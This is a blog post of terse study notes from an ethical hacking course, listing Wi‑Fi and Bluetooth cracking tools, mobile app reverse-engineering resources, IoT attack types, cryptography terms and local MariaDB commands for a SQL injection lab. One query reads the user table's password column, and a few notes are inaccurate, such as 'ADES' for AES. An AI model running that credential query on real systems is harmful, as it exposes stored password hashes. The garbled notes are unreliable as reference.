For reception, the opposite is true. We want to be able to receive weaker signals, and a good antenna should be able to operate down to about minus 90 dBm.
Yagi antenna or fishbone antenna
Parabolic antenna
wifite | Kali Linux Tools
https://www.kali.org/tools/wifite/
reaver | Kali Linux Tools
https://www.kali.org/tools/reaver/
Reaver
Wash
Airmon-ng
https://www.aircrack-ng.org/doku.php?id=airmon-ng
Dragonblood
https://wpa3.mathyvanhoef.com/
Wifi Pineapple:
WiFi Pineapple - Hak5
fern
fern-wifi-cracker | Kali Linux Tools
https://www.kali.org/tools/fern-wifi-cracker/
MetaGeek | inSSIDer - Defeat Slow Wi-Fi
https://www.metageek.com/inssider/
fern-wifi-cracker | Kali Linux Tools
https://www.kali.org/tools/fern-wifi-cracker/
Bluetooth
Serial Port Profile SPP
Human interface Device Profile HID
Hands-Free Profile HFP
Advanced Audio Distribution Profile A2DP
Audio/Video Remote control Profile AVRCP
┌──(kali㉿kali)-[~]
└─$ lsusb
┌──(kali㉿kali)-[~]
└─$ sudo bluelog -l
┌──(kali㉿kali)-[~]
└─$ btscanner
┌──(kali㉿kali)-[~]
└─$ fang -h
Chapter 15: Ethical Hacking: Mobile Devices and Platforms, by Malcolm Shore
Mobile technology
OWASP Mobile Security methodologies
Effective testing
Static analysis
App source code
Reverse Engg.
Clone runtime environment
Identify
All N/w interfaces
N/W protocols
Complements interactions
Data access
App interfaces
Encryption
Pinning
Certificate
Public key
Dynamic analysis
Changes to device storage
Info transmitted
Web app testing
Forensic analysis
Virtualization
OWASP Mobile Security Testing Guide
OWASP flagship project provides a security standard for mobile apps (OWASP MASVS) and a comprehensive testing guide (OWASP MSTG) that covers the processes, techniques, and tools used during a mobile app security test, as well as an exhaustive set of test cases that enables testers to deliver consistent and complete results.
https://owasp.org/www-project-mobile-security-testing-guide/
Android
Builds on the Linux security model
“*.dex” extensions are Dalvik executable files.
Download Android Studio & App Tools
https://developer.android.com/studio
Apktool - A tool for reverse engineering 3rd party, closed, binary Android apps.
https://ibotpeaches.github.io/Apktool/
Apk Files
https://www.apkfiles.com/
dex2jar download | SourceForge.net
https://sourceforge.net/projects/dex2jar/
dex2jar | Kali Linux Tools
https://www.kali.org/tools/dex2jar/
GitHub - skylot/jadx: Dex to Java decompiler
https://github.com/skylot/jadx
OWASP Security Shepherd
The OWASP Security Shepherd Project is a web and mobile application security training platform. Security Shepherd has been designed to foster and improve security awareness among a varied skill-set demographic. The aim of this project is to take AppSec novices or experienced engineers and sharpen their penetration testing skill set to security expert status.
https://owasp.org/www-project-security-shepherd/
Chapter 16: Ethical Hacking: Hacking IoT Devices, by Luciano Ferrari
Internet of Things
IoT Attacks
Lack of security
Vulnerable interfaces
Lack of firmware updates
OWASP Internet of Things
https://owasp.org/www-project-internet-of-things/
https://wiki.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Top_10
Type of attacks
DDoS
Rolling code attack
BlueBorne attack
Jamming attacks
Backdoor
Sybil
Side channel
Hacking Methodology
Information gathering
Vulnerability scanning
Launch attack
Gain access
Maintain access
Chapter 17 :Ethical Hacking: Cryptography, by Stephanie Domas
Cryptography
Symmetric Cryptography
Asymmetric
Hashing
Ciphers
Plaintext
Block
Stream
DES - Data Encryption standard
Replaced by AES
ADES - Advanced Encryption Standard
RC - Rivest Cipher
Symmetric
Designed by Ron Rivest
RC4
RC5
RC6
ECC - Elliptical Curve Cryptography
Diffie-Hellman
Hybrid Cipher
Symmetric & Asymmetric combined together
Hasing
One way function
Used in passwords
MD5 - Message Digest
128-bit o/p
SHA - Secure hashing Algorithm
160-bit o/p
Digital Certificates
Authorized Agency Verification
CA - Certificate authority verification
Digital Certificate X.509
Version
Serial no
Algorithm ID
Issuer
Validity
DSA - Digital Signature Algorithm
PKI - Public Key Infrastructure
Certificate management system
Digital certificate
CRL - certification revocation list
CA - certificate authority
RA registration authority
Enduser
New Secure Protocols
S/MIME - Secure MIME - added digital signature, public key encryption to emails
PGP - Pretty good privacy - similar to PKI
SSH - secure shell - encrypted channels for remote command for a system.
Real world exploits
Distributed.net
Electronic Frontier Foundation EFF
Electronic Frontier Foundation
https://www.eff.org
HEARTbleed
https://heartbleed.com/
Poodlebleed "Padding Oracle On Downgraded Legacy Encryption"
DROWN - Decrypting RSA with Obsolete and Weakened eNcryption
https://drownattack.com/
FREAK ("Factoring RSA Export Keys")
Chapter 18: Ethical Hacking: Cloud Computing, by Daniel Lachance
Cloud Overview
XaaS
SaaS
PaaS
IaaS
Cloud identity Management
MFA Multi Factor Authentication
RBAC Role-Based Access Control
Cloud High Availability
Business Continuity and Risk Management
Identify assets
Identify assets threats
Identify threat likelihood
Data Replication
Application Resiliency
GDPR General Data Protection Regulation
PCI DSS - Payment Card Industry Data Security
Chapter 19: Ethical Hacking: SQL Injection, by Malcolm Shore
Testing SQL Injection
OWASP Security Shepherd
-https://owasp.org/www-project-security-shepherd/
┌──(kali㉿kali)-[~]
└─$ service mysql start
┌──(kali㉿kali)-[~]
└─$ sudo mysql -u root -p
MariaDB [(none)]> show databases;
MariaDB [(none)]> use information_schema;
MariaDB [information_schema]> show tables;
MariaDB [information_schema]> use mysql
MariaDB [mysql]> show database;
MariaDB [mysql]> show tables;
MariaDB [mysql]> show columns from user;
MariaDB [mysql]> select user,password from user;
***********************************************************************************************************
Comments
Post a Comment